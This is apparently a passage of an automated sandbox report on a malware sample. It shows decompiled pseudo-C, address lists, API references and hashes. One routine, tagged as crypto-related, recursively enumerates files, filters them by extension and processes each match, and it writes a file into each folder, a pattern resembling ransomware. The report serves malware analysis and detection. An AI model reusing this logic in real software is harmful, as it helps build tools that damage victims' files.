					MessageBoxW(0, _t44, 0, 0);
				} else {
					if(lstrlenW(_t44) < 0x400) {
						lstrcpynW(_t48, _t44, 0x400);
						E00412BA0(_t48);
					} else {
						E0042B420(_t48, 0, 0x800);
						E0042D8D0(_t48, _t44, 0x7fe);
						E00412BA0(_t48);
					}
				}
				LocalFree(_v8);
				return LocalFree(_t44);
			}

0x0041190a
0x0041190c
0x00411913
0x0041191b
0x0041191b
0x00411932
0x00411941
0x0041195f
0x00411962
0x00411974
0x0041197e
0x0041198b
0x00411993
0x00411999
0x0041199b
0x004119a0
0x004119f2
0x004119a2
0x004119ae
0x004119dc
0x004119e4
0x004119b0
0x004119b8
0x004119c4
0x004119ce
0x004119ce
0x004119ae
0x00411a01
0x00411a0c

APIs

GetLastError.KERNEL32 ref: 00411915
FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
lstrcpyW.KERNEL32 ref: 00411962
lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
lstrcatW.KERNEL32(00000000,?), ref: 0041198B
lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
lstrcatW.KERNEL32(00000000,?), ref: 00411999
lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
_memset.LIBCMT ref: 004119B8
lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC

Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9

LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04

Strings

failed with error , xrefs: 0041196E

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
String ID: failed with error
API String ID: 4182478520-946485432
Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED

Uniqueness

Uniqueness Score: -1.00%

Function 0040F730 Relevance: 29.2, APIs: 19, Instructions: 732
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E0040F730(intOrPtr __ecx, signed int __edx, char _a4, intOrPtr _a24, intOrPtr _a28, char _a32) {
				signed int _v8;
				intOrPtr _v16;
				char _v17;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v48;
				void* _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				WCHAR* _v92;
				short _v104;
				signed int _v108;
				signed int _v112;
				char _v128;
				signed int _v132;
				signed int _v136;
				short _v152;
				char _v156;
				signed int _v160;
				signed int _v164;
				short _v180;
				intOrPtr _v184;
				char _v204;
				struct _WIN32_FIND_DATAW _v796;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t305;
				intOrPtr _t315;
				WCHAR* _t322;
				void* _t323;
				void* _t326;
				signed int _t330;
				signed int _t331;
				int _t333;
				signed int _t335;
				signed int _t336;
				intOrPtr _t340;
				intOrPtr _t346;
				intOrPtr* _t348;
				void* _t349;
				void* _t352;
				intOrPtr* _t354;
				void* _t355;
				intOrPtr* _t356;
				void* _t357;
				void* _t374;
				signed int _t380;
				WCHAR* _t381;
				WCHAR* _t392;
				WCHAR* _t394;
				void* _t451;
				void* _t457;
				signed int _t458;
				signed int _t460;
				WCHAR* _t461;
				intOrPtr _t462;
				intOrPtr _t463;
				void* _t464;
				intOrPtr* _t467;
				signed int _t469;
				intOrPtr* _t472;
				signed int _t474;
				char* _t481;
				char* _t482;
				intOrPtr* _t484;
				signed int _t486;
				intOrPtr* _t488;
				short* _t494;
				signed int _t497;
				signed int _t500;
				WCHAR* _t501;
				short* _t502;
				signed int _t507;
				intOrPtr* _t515;
				void* _t517;
				void* _t518;
				void* _t519;
				intOrPtr _t523;
				intOrPtr _t524;
				signed int _t525;
				signed int _t528;
				WCHAR* _t529;
				intOrPtr _t531;
				void* _t537;
				signed int* _t538;
				void* _t540;
				intOrPtr* _t541;
				intOrPtr* _t542;
				WCHAR* _t543;
				short _t544;
				intOrPtr _t545;
				void* _t546;
				void* _t547;
				short* _t549;
				void* _t550;
				short* _t551;

				_push(0xffffffff);
				_push(0x4cab09);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t545;
				_t546 = _t545 - 0x30c;
				_t456 = __edx;
				_v56 = __ecx;
				_v24 = __edx;
				_v8 = 0;
				E00411AB0();
				_t528 = 0;
				_t537 = (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2);
				_v52 = _t537;
				if(_t537 == 0) {
					L15:
					_v108 = 7;
					_v112 = 0;
					_v128 = 0;
					_v8 = 3;
					_push(0xffffffff);
					_push(0);
					_v64 = 0;
					_v80 = 0;
					_v60 = 7;
					E00414690(_t456,  &_v80,  &_a4);
					_v8 = 4;
					_t457 = PathFindFileNameW;
					_t302 =  >=  ? _v80 :  &_v80;
					_t515 = PathFindFileNameW( >=  ? _v80 :  &_v80);
					_v132 = 7;
					_v136 = 0;
					_v152 = 0;
					if( *_t515 != 0) {
						_t467 = _t515;
						_t77 = _t467 + 2; // 0x2
						_t537 = _t77;
						do {
							_t305 =  *_t467;
							_t467 = _t467 + 2;
						} while (_t305 != 0);
						_t469 = _t467 - _t537 >> 1;
						goto L24;
					} else {
						_t469 = 0;
						L24:
						_push(_t469);
						E00415C10(_t457,  &_v152, _t528, _t537, _t515);
						_v8 = 5;
						_t538 = E00413520( &_v80,  &_v48, 0, _v64 - _v136);
						if( &_v80 != _t538) {
							if(_v60 >= 8) {
								L00422587(_v80);
								_t546 = _t546 + 4;
							}
							_v60 = 7;
							_v64 = 0;
							_v80 = 0;
							if(_t538[5] >= 8) {
								_v80 =  *_t538;
								 *_t538 = 0;
							} else {
								_t430 = _t538[4] + 1;
								if(_t538[4] + 1 != 0) {
									E004205A0( &_v80, _t538, _t430 + _t430);
									_t546 = _t546 + 0xc;
								}
							}
							_v64 = _t538[4];
							_v60 = _t538[5];
							_t538[5] = 7;
							_t538[4] = 0;
							 *_t538 = 0;
						}
						if(_v28 >= 8) {
							L00422587(_v48);
							_t546 = _t546 + 4;
						}
						_t529 = 0;
						while(_v64 != 0 || _v136 != 0) {
							_t529 =  &(_t529[0]);
							_t313 =  >=  ? _v80 :  &_v80;
							_t515 = PathFindFileNameW( >=  ? _v80 :  &_v80);
							if( *_t515 != 0) {
								_t472 = _t515;
								_t107 = _t472 + 2; // 0x2
								_t538 = _t107;
								do {
									_t315 =  *_t472;
									_t472 = _t472 + 2;
								} while (_t315 != 0);
								_t474 = _t472 - _t538 >> 1;
								L42:
								_push(_t474);
								E00415C10(_t457,  &_v152, _t529, _t538, _t515);
								_t538 = E00413520( &_v80,  &_v48, 0, _v64 - _v136);
								if( &_v80 != _t538) {
									if(_v60 >= 8) {
										L00422587(_v80);
										_t546 = _t546 + 4;
									}
									_v60 = 7;
									_v64 = 0;
									_v80 = 0;
									if(_t538[5] >= 8) {
										_v80 =  *_t538;
										 *_t538 = 0;
									} else {
										_t418 = _t538[4] + 1;
										if(_t538[4] + 1 != 0) {
											E004205A0( &_v80, _t538, _t418 + _t418);
											_t546 = _t546 + 0xc;
										}
									}
									_v64 = _t538[4];
									_v60 = _t538[5];
									_t538[5] = 7;
									_t538[4] = 0;
									 *_t538 = 0;
								}
								if(_v28 >= 8) {
									L00422587(_v48);
									_t546 = _t546 + 4;
								}
								continue;
							}
							_t474 = 0;
							goto L42;
						}
						if(_t529 > 3) {
							L73:
							_t322 = E00417140( &_v104,  &_a4, "*");
							_t547 = _t546 + 4;
							if(_t322[0xa] >= 8) {
								_t322 =  *_t322;
							}
							_t323 = FindFirstFileW(_t322,  &_v796);
							_v52 = _t323;
							if(_v84 >= 8) {
								L00422587(_v104);
								_t323 = _v52;
								_t547 = _t547 + 4;
							}
							_v84 = 7;
							_t458 = 0;
							_v88 = 0;
							_v104 = 0;
							_v24 = 0;
							if(_t323 == 0xffffffff) {
								L139:
								if(_v132 >= 8) {
									L00422587(_v152);
									_t547 = _t547 + 4;
								}
								_v132 = 7;
								_v136 = 0;
								_v152 = 0;
								if(_v60 >= 8) {
									L00422587(_v80);
									_t547 = _t547 + 4;
								}
								_v60 = 7;
								_v64 = 0;
								_v80 = 0;
								if(_v108 >= 8) {
									L00422587(_v128);
									_t547 = _t547 + 4;
								}
								_t326 = 0;
								_v108 = 7;
								_v112 = 0;
								_v128 = 0;
								goto L146;
							} else {
								_t540 = _v52;
								do {
									_t481 = ".";
									_t330 =  &(_v796.cFileName);
									while(1) {
										_t517 =  *_t330;
										if(_t517 !=  *_t481) {
											break;
										}
										if(_t517 == 0) {
											L84:
											_t331 = 0;
											L86:
											if(_t331 == 0) {
												goto L137;
											}
											_t482 = L"..";
											_t335 =  &(_v796.cFileName);
											while(1) {
												_t518 =  *_t335;
												if(_t518 !=  *_t482) {
													break;
												}
												if(_t518 == 0) {
													L92:
													_t336 = 0;
													L94:
													if(_t336 == 0) {
														goto L137;
													}
													if((_v796.dwFileAttributes & 0x00000010) == 0) {
														_t460 = _t458 + 1;
														_v24 = _t460;
														if(_t460 >= 0x400) {
															_v24 = 0;
															E00411AB0();
														}
														if(_a32 == 0) {
															goto L137;
														} else {
															_v28 = 7;
															_push(0xffffffff);
															_push(0);
															_v48 = 0;
															_v32 = 0;
															E00414690(_t460,  &_v48,  &_a4);
															_v8 = 9;
															if(_v796.cFileName != 0) {
																_t484 =  &(_v796.cFileName);
																_t241 = _t484 + 2; // 0x2
																_t519 = _t241;
																do {
																	_t340 =  *_t484;
																	_t484 = _t484 + 2;
																} while (_t340 != 0);
																_t486 = _t484 - _t519 >> 1;
																L108:
																_push(_t486);
																_t487 =  &_v48;
																E00415AE0(_t460,  &_v48, _t529, _t540,  &(_v796.cFileName));
																_t344 =  >=  ? _v48 :  &_v48;
																_t461 = PathFindExtensionW( >=  ? _v48 :  &_v48);
																_v17 = 0;
																_t346 = _v56;
																_t541 =  *((intOrPtr*)(_t346 + 0x88c));
																_t531 =  *((intOrPtr*)(_t346 + 0x890));
																if(_t541 == _t531) {
																	L118:
																	_t542 =  *((intOrPtr*)(_t346 + 0x898));
																	_t529 =  *(_t346 + 0x89c);
																	if(_t542 == _t529) {
																		L126:
																		if(_v17 == 0) {
																			_t348 = _t346 + 0x868;
																			if( *((intOrPtr*)(_t348 + 0x14)) >= 8) {
																				_t348 =  *_t348;
																			}
																			_push(_t461);
																			_push(_t348);
																			_t349 = E00421C02(_t487);
																			_t547 = _t547 + 8;
																			if(_t349 == 0) {
																				_t462 = _v56;
																				_t488 = _t462 + 0x820;
																				if( *((intOrPtr*)(_t462 + 0x834)) >= 8) {
																					_t488 =  *_t488;
																				}
																				_push(_t488);
																				_t351 =  >=  ? _v48 :  &_v48;
																				_push( >=  ? _v48 :  &_v48);
																				_t352 = E00421C02(_t488);
																				_t547 = _t547 + 8;
																				if(_t352 == 0) {
																					_t521 =  >=  ? _v48 :  &_v48;
																					E004111C0(_t462,  >=  ? _v48 :  &_v48);
																				}
																			}
																		}
																		L134:
																		_v8 = 5;
																		if(_v28 >= 8) {
																			L00422587(_v48);
																			_t547 = _t547 + 4;
																		}
																		_t540 = _v52;
																		goto L137;
																	}
																	L120:
																	L120:
																	if( *((intOrPtr*)(_t542 + 0x14)) < 8) {
																		_t354 = _t542;
																	} else {
																		_t354 =  *_t542;
																	}
																	_t487 =  &(_v796.cFileName);
																	_push( &(_v796.cFileName));
																	_push(_t354);
																	_t355 = E00421C02( &(_v796.cFileName));
																	_t547 = _t547 + 8;
																	if(_t355 != 0) {
																		goto L134;
																	}
																	_t542 = _t542 + 0x18;
																	if(_t542 != _t529) {
																		goto L120;
																	}
																	_t346 = _v56;
																	goto L126;
																}
																L110:
																L110:
																if( *((intOrPtr*)(_t541 + 0x14)) < 8) {
																	_t356 = _t541;
																} else {
																	_t356 =  *_t541;
																}
																_push(_t461);
																_push(_t356);
																_t357 = E00421C02(_t487);
																_t547 = _t547 + 8;
																if(_t357 != 0) {
																	goto L116;
																}
																_t541 = _t541 + 0x18;
																if(_t541 != _t531) {
																	goto L110;
																}
																L117:
																_t346 = _v56;
																goto L118;
																L116:
																_v17 = 1;
																goto L117;
															}
															_t486 = 0;
															goto L108;
														}
													}
													E00417140( &_v204,  &_a4,  &(_v796.cFileName));
													_t547 = _t547 + 4;
													_push(1);
													_v8 = 7;
													E00415AE0(_t458,  &_v204, _t529, _t540, "\\");
													_v160 = 7;
													_v164 = 0;
													_v180 = 0;
													_push(0xffffffff);
													_push(0);
													_v8 = 8;
													E00414690(_t458,  &_v180,  &_v204);
													_v156 = 0;
													E00413B70(_a28,  &_v180);
													if(_v160 >= 8) {
														L00422587(_v180);
														_t547 = _t547 + 4;
													}
													_v8 = 5;
													_v160 = 7;
													_v164 = 0;
													_v180 = 0;
													if(_v184 >= 8) {
														L00422587(_v204);
														_t547 = _t547 + 4;
													}
													goto L137;
												}
												_t523 =  *((intOrPtr*)(_t335 + 2));
												_t204 =  &(_t482[2]); // 0x2e
												if(_t523 !=  *_t204) {
													break;
												}
												_t335 = _t335 + 4;
												_t482 =  &(_t482[4]);
												if(_t523 != 0) {
													continue;
												}
												goto L92;
											}
											asm("sbb eax, eax");
											_t336 = _t335 | 0x00000001;
											goto L94;
										}
										_t524 =  *((intOrPtr*)(_t330 + 2));
										_t201 =  &(_t481[2]); // 0x2e0000
										if(_t524 !=  *_t201) {
											break;
										}
										_t330 = _t330 + 4;
										_t481 =  &(_t481[4]);
										if(_t524 != 0) {
											continue;
										}
										goto L84;
									}
									asm("sbb eax, eax");
									_t331 = _t330 | 0x00000001;
									goto L86;
									L137:
									_t333 = FindNextFileW(_t540,  &_v796);
									_t458 = _v24;
								} while (_t333 != 0);
								FindClose(_t540);
								goto L139;
							}
						}
						_t549 = _t546 - 0x18;
						_t494 = _t549;
						_push(0xffffffff);
						 *(_t494 + 0x14) = 7;
						 *(_t494 + 0x10) = 0;
						_push(0);
						 *_t494 = 0;
						E00414690(_t457, _t494,  &_a4);
						_t374 = E0040F310(_t529, _t538);
						_t546 = _t549 + 0x18;
						if(_t374 != 0) {
							goto L73;
						}
						_push(0xffffffff);
						_push(0);
						E00414690(_t457,  &_v128,  &_a4);
						E00413A90(_t457,  &_v92, _t529, _v112 + 0x400);
						_v8 = 6;
						_t497 = 0;
						_t380 = _v112;
						_t543 = _v92;
						if(_t380 == 0) {
							L57:
							_t463 = _v56;
							 *((short*)(_t543 + 2 + _t380 * 2)) = 0;
							_t381 = _t463 + 0x820;
							if(_t381[0xa] >= 8) {
								_t381 =  *_t381;
							}
							PathAppendW(_t543, _t381);
							_push(_v24);
							_v28 = 7;
							_v32 = 0;
							_v48 = 0;
							E00418400( &_v48, _t543, _v88);
							if(_v108 >= 8) {
								L00422587(_v128);
								_t546 = _t546 + 4;
							}
							_t500 = _v28;
							_v108 = 7;
							_v112 = 0;
							_v128 = 0;
							if(_t500 >= 8) {
								_v128 = _v48;
							} else {
								_t402 = _v32 + 1;
								if(_v32 + 1 != 0) {
									E004205A0( &_v128,  &_v48, _t402 + _t402);
									_t500 = _v28;
									_t546 = _t546 + 0xc;
								}
							}
							_v112 = _v32;
							_t389 =  >=  ? _v128 :  &_v128;
							_v108 = _t500;
							if(PathFileExistsW( >=  ? _v128 :  &_v128) == 0) {
								_t392 = E00420C62(_t463, _t515, _t529, 0x7d00);
								_t501 = _t463 + 0x838;
								_t550 = _t546 + 4;
								_t529 = _t392;
								if(_t501[0xa] >= 8) {
									_t501 =  *_t501;
								}
								lstrcpyW(_t529, _t501);
								_t394 = _t463 + 0x850;
								if( *((intOrPtr*)(_t463 + 0x864)) >= 8) {
									_t394 =  *_t394;
								}
								lstrcatW(_t529, _t394);
								_t551 = _t550 - 0x18;
								_t502 = _t551;
								_push(0xffffffff);
								 *(_t502 + 0x14) = 7;
								 *(_t502 + 0x10) = 0;
								_push(0);
								 *_t502 = 0;
								E00414690(_t463, _t502,  &_v128);
								E0040F0E0(_t529);
								E00420BED(_t529);
								_t546 = _t551 + 0x1c;
							}
							_v8 = 5;
							if(_t543 != 0) {
								L00422587(_t543);
								_t546 = _t546 + 4;
							}
							goto L73;
						}
						do {
							_t409 =  >=  ? _v128 :  &_v128;
							_t543[_t497] = ( >=  ? _v128 :  &_v128)[_t497];
							_t497 = _t497 + 1;
							_t380 = _v112;
						} while (_t497 < _t380);
						goto L57;
					}
				} else {
					_t464 = 0;
					do {
						_v28 = 7;
						_push(0xffffffff);
						_push(0);
						_v48 = 0;
						_v32 = 0;
						E00414690(_t464,  &_v48,  &_a4);
						_v8 = 1;
						_push(0xffffffff);
						_push(0);
						_v104 = 0;
						_v84 = 7;
						_v88 = 0;
						E00414690(_t464,  &_v104,  *_v24 + _t464);
						_v8 = 2;
						_t525 = _v32;
						if(_t525 <= 1) {
							L10:
							if(_v84 >= 8) {
								L00422587(_v104);
								_t546 = _t546 + 4;
							}
							_v84 = 7;
							_v8 = 0;
							_v88 = 0;
							_v104 = 0;
							if(_v28 >= 8) {
								L00422587(_v48);
								_t546 = _t546 + 4;
							}
							goto L14;
						}
						_t507 = _v88;
						if(_t507 <= 1) {
							goto L10;
						} else {
							_t446 =  >=  ? _v48 :  &_v48;
							if( *((short*)(( >=  ? _v48 :  &_v48) + _t525 * 2 - 2)) != 0x5c) {
								_push(1);
								E00415AE0(_t464,  &_v48, _t528, _t537, "\\");
								_t507 = _v88;
							}
							_t544 = _v104;
							_t448 =  >=  ? _t544 :  &_v104;
							if( *((short*)(( >=  ? _t544 :  &_v104) + _t507 * 2 - 2)) != 0x5c) {
								_push(1);
								E00415AE0(_t464,  &_v104, _t528, _t544, "\\");
								_t544 = _v104;
							}
							_t509 =  >=  ? _t544 :  &_v104;
							_t450 =  >=  ? _v48 :  &_v48;
							_t451 = E00420235(_t464, _t528, _t544,  >=  ? _v48 :  &_v48,  >=  ? _t544 :  &_v104);
							_t547 = _t546 + 8;
							if(_t451 == 0) {
								if(_v84 >= 8) {
									L00422587(_v104);
									_t547 = _t547 + 4;
								}
								_t326 = 0;
								_v84 = 7;
								_v88 = 0;
								_v104 = 0;
								if(_v28 >= 8) {
									_t326 = L00422587(_v48);
									_t547 = _t547 + 4;
								}
								L146:
								if(_a24 >= 8) {
									_t326 = L00422587(_a4);
								}
								 *[fs:0x0] = _v16;
								return _t326;
							} else {
								_t537 = _v52;
								goto L10;
							}
						}
						L14:
						_t528 = _t528 + 1;
						_t464 = _t464 + 0x18;
					} while (_t528 < _t537);
					goto L15;
				}
			}

0x0040f733
0x0040f735
0x0040f740
0x0040f741
0x0040f748
0x0040f750
0x0040f752
0x0040f756
0x0040f759
0x0040f760
0x0040f76f
0x0040f77e
0x0040f780
0x0040f783
0x0040f8b5
0x0040f8b7
0x0040f8be
0x0040f8c5
0x0040f8c9
0x0040f8d0
0x0040f8d2
0x0040f8d3
0x0040f8d6
0x0040f8de
0x0040f8e5
0x0040f8ea
0x0040f8f5
0x0040f8fb
0x0040f902
0x0040f904
0x0040f90d
0x0040f917
0x0040f921
0x0040f966
0x0040f968
0x0040f968
0x0040f970
0x0040f970
0x0040f973
0x0040f976
0x0040f97d
0x00000000
0x0040f923
0x0040f923
0x0040f97f
0x0040f97f
0x0040f987
0x0040f98c
0x0040f9a8
0x0040f9af
0x0040f9b5
0x0040f9ba
0x0040f9bf
0x0040f9bf
0x0040f9c4
0x0040f9cb
0x0040f9d2
0x0040f9da
0x0040f9f6
0x0040f9f9
0x0040f9dc
0x0040f9df
0x0040f9e0
0x0040f9ea
0x0040f9ef
0x0040f9ef
0x0040f9e0
0x0040fa02
0x0040fa08
0x0040fa0d
0x0040fa14
0x0040fa1b
0x0040fa1b
0x0040fa22
0x0040fa27
0x0040fa2c
0x0040fa2c
0x0040fa2f
0x0040fa31
0x0040fa44
0x0040fa4c
0x0040fa53
0x0040fa59
0x0040fa5f
0x0040fa61
0x0040fa61
0x0040fa64
0x0040fa64
0x0040fa67
0x0040fa6a
0x0040fa71
0x0040fa73
0x0040fa73
0x0040fa7b
0x0040fa98
0x0040fa9f
0x0040faa5
0x0040faaa
0x0040faaf
0x0040faaf
0x0040fab4
0x0040fabb
0x0040fac2
0x0040faca
0x0040fae6
0x0040fae9
0x0040facc
0x0040facf
0x0040fad0
0x0040fada
0x0040fadf
0x0040fadf
0x0040fad0
0x0040faf2
0x0040faf8
0x0040fafd
0x0040fb04
0x0040fb0b
0x0040fb0b
0x0040fb12
0x0040fb1b
0x0040fb20
0x0040fb20
0x00000000
0x0040fb12
0x0040fa5b
0x00000000
0x0040fa5b
0x0040fb2b
0x0040fcf0
0x0040fcfb
0x0040fd00
0x0040fd07
0x0040fd09
0x0040fd09
0x0040fd13
0x0040fd1d
0x0040fd20
0x0040fd25
0x0040fd2a
0x0040fd2d
0x0040fd2d
0x0040fd32
0x0040fd39
0x0040fd3b
0x0040fd42
0x0040fd46
0x0040fd4c
0x00410072
0x00410076
0x0041007e
0x00410083
0x00410083
0x00410088
0x00410093
0x0041009d
0x004100a4
0x004100a9
0x004100ae
0x004100ae
0x004100b3
0x004100be
0x004100c5
0x004100c9
0x004100ce
0x004100d3
0x004100d3
0x004100d6
0x004100d8
0x004100df
0x004100e6
0x00000000
0x0040fd52
0x0040fd52
0x0040fd60
0x0040fd60
0x0040fd65
0x0040fd70
0x0040fd70
0x0040fd76
0x00000000
0x00000000
0x0040fd7b
0x0040fd92
0x0040fd92
0x0040fd9b
0x0040fd9d
0x00000000
0x00000000
0x0040fda3
0x0040fda8
0x0040fdb0
0x0040fdb0
0x0040fdb6
0x00000000
0x00000000
0x0040fdbb
0x0040fdd2
0x0040fdd2
0x0040fddb
0x0040fddd
0x00000000
0x00000000
0x0040fdea
0x0040fec2
0x0040fec3
0x0040fecc
0x0040fece
0x0040fed5
0x0040fed5
0x0040fede
0x00000000
0x0040fee4
0x0040fee6
0x0040feed
0x0040feef
0x0040fef0
0x0040fefa
0x0040ff02
0x0040ff07
0x0040ff13
0x0040ff19
0x0040ff1f
0x0040ff1f
0x0040ff22
0x0040ff22
0x0040ff25
0x0040ff28
0x0040ff2f
0x0040ff31
0x0040ff31
0x0040ff39
0x0040ff3c
0x0040ff48
0x0040ff53
0x0040ff55
0x0040ff59
0x0040ff5c
0x0040ff62
0x0040ff6a
0x0040ff9a
0x0040ff9a
0x0040ffa0
0x0040ffa8
0x0040ffda
0x0040ffde
0x0040ffe0
0x0040ffe9
0x0040ffeb
0x0040ffeb
0x0040ffed
0x0040ffee
0x0040ffef
0x0040fff4
0x0040fff9
0x0040fffb
0x00410005
0x0041000b
0x0041000d
0x0041000d
0x00410016
0x00410017
0x0041001b
0x0041001c
0x00410021
0x00410026
0x00410031
0x00410035
0x00410035
0x00410026
0x0040fff9
0x0041003a
0x0041003a
0x00410042
0x00410047
0x0041004c
0x0041004c
0x0041004f
0x00000000
0x0041004f
0x00000000
0x0040ffb0
0x0040ffb4
0x0040ffba
0x0040ffb6
0x0040ffb6
0x0040ffb6
0x0040ffbc
0x0040ffc2
0x0040ffc3
0x0040ffc4
0x0040ffc9
0x0040ffce
0x00000000
0x00000000
0x0040ffd0
0x0040ffd5
0x00000000
0x00000000
0x0040ffd7
0x00000000
0x0040ffd7
0x00000000
0x0040ff70
0x0040ff74
0x0040ff7a
0x0040ff76
0x0040ff76
0x0040ff76
0x0040ff7c
0x0040ff7d
0x0040ff7e
0x0040ff83
0x0040ff88
0x00000000
0x00000000
0x0040ff8a
0x0040ff8f
0x00000000
0x00000000
0x0040ff97
0x0040ff97
0x00000000
0x0040ff93
0x0040ff93
0x00000000
0x0040ff93
0x0040ff15
0x00000000
0x0040ff15
0x0040fede
0x0040fe00
0x0040fe05
0x0040fe08
0x0040fe15
0x0040fe19
0x0040fe20
0x0040fe2a
0x0040fe34
0x0040fe3b
0x0040fe3d
0x0040fe44
0x0040fe4f
0x0040fe5e
0x0040fe65
0x0040fe71
0x0040fe79
0x0040fe7e
0x0040fe7e
0x0040fe83
0x0040fe8e
0x0040fe98
0x0040fea2
0x0040fea9
0x0040feb5
0x0040feba
0x0040feba
0x00000000
0x0040fea9
0x0040fdbd
0x0040fdc1
0x0040fdc5
0x00000000
0x00000000
0x0040fdc7
0x0040fdca
0x0040fdd0
0x00000000
0x00000000
0x00000000
0x0040fdd0
0x0040fdd6
0x0040fdd8
0x00000000
0x0040fdd8
0x0040fd7d
0x0040fd81
0x0040fd85
0x00000000
0x00000000
0x0040fd87
0x0040fd8a
0x0040fd90
0x00000000
0x00000000
0x00000000
0x0040fd90
0x0040fd96
0x0040fd98
0x00000000
0x00410052
0x0041005a
0x00410060
0x00410063
0x0041006c
0x00000000
0x0041006c
0x0040fd4c
0x0040fb31
0x0040fb36
0x0040fb38
0x0040fb3a
0x0040fb41
0x0040fb48
0x0040fb49
0x0040fb50
0x0040fb55
0x0040fb5a
0x0040fb5f
0x00000000
0x00000000
0x0040fb65
0x0040fb67
0x0040fb70
0x0040fb81
0x0040fb86
0x0040fb8a
0x0040fb8c
0x0040fb8f
0x0040fb94
0x0040fbbb
0x0040fbbb
0x0040fbc0
0x0040fbc5
0x0040fbcf
0x0040fbd1
0x0040fbd1
0x0040fbd5
0x0040fbdb
0x0040fbe0
0x0040fbed
0x0040fbf5
0x0040fbf9
0x0040fc02
0x0040fc07
0x0040fc0c
0x0040fc0c
0x0040fc0f
0x0040fc14
0x0040fc1b
0x0040fc22
0x0040fc29
0x0040fc4c
0x0040fc2b
0x0040fc2e
0x0040fc2f
0x0040fc3c
0x0040fc41
0x0040fc44
0x0040fc44
0x0040fc2f
0x0040fc55
0x0040fc5b
0x0040fc60
0x0040fc6b
0x0040fc72
0x0040fc77
0x0040fc7d
0x0040fc84
0x0040fc86
0x0040fc88
0x0040fc88
0x0040fc8c
0x0040fc99
0x0040fc9f
0x0040fca1
0x0040fca1
0x0040fca5
0x0040fcab
0x0040fcb0
0x0040fcb2
0x0040fcb4
0x0040fcbb
0x0040fcc2
0x0040fcc3
0x0040fcca
0x0040fcd1
0x0040fcd7
0x0040fcdc
0x0040fcdc
0x0040fcdf
0x0040fce5
0x0040fce8
0x0040fced
0x0040fced
0x00000000
0x0040fce5
0x0040fba0
0x0040fba7
0x0040fbaf
0x0040fbb3
0x0040fbb4
0x0040fbb7
0x00000000
0x0040fba0
0x0040f789
0x0040f789
0x0040f790
0x0040f792
0x0040f799
0x0040f79b
0x0040f79c
0x0040f7a6
0x0040f7ae
0x0040f7b3
0x0040f7bc
0x0040f7be
0x0040f7bf
0x0040f7ca
0x0040f7d2
0x0040f7d9
0x0040f7de
0x0040f7e2
0x0040f7e8
0x0040f870
0x0040f874
0x0040f879
0x0040f87e
0x0040f87e
0x0040f883
0x0040f88a
0x0040f891
0x0040f898
0x0040f89c
0x0040f8a1
0x0040f8a6
0x0040f8a6
0x00000000
0x0040f89c
0x0040f7ee
0x0040f7f4
0x00000000
0x0040f7f6
0x0040f7fd
0x0040f807
0x0040f809
0x0040f813
0x0040f818
0x0040f818
0x0040f821
0x0040f827
0x0040f830
0x0040f832
0x0040f83c
0x0040f844
0x0040f844
0x0040f850
0x0040f858
0x0040f85d
0x0040f862
0x0040f867
0x0040f92b
0x0040f930
0x0040f935
0x0040f935
0x0040f938
0x0040f93a
0x0040f945
0x0040f94c
0x0040f950
0x0040f959
0x0040f95e
0x0040f95e
0x004100ea
0x004100ee
0x004100f3
0x004100f8
0x00410100
0x0041010b
0x0040f86d
0x0040f86d
0x00000000
0x0040f86d
0x0040f867
0x0040f8a9
0x0040f8a9
0x0040f8aa
0x0040f8ad
0x00000000
0x0040f790

APIs

Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411ACA
Part of subcall function 00411AB0: DispatchMessageW.USER32 ref: 00411AE0
Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411AEE

PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
_memmove.LIBCMT ref: 0040F9EA
PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
_memmove.LIBCMT ref: 0040FADA

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

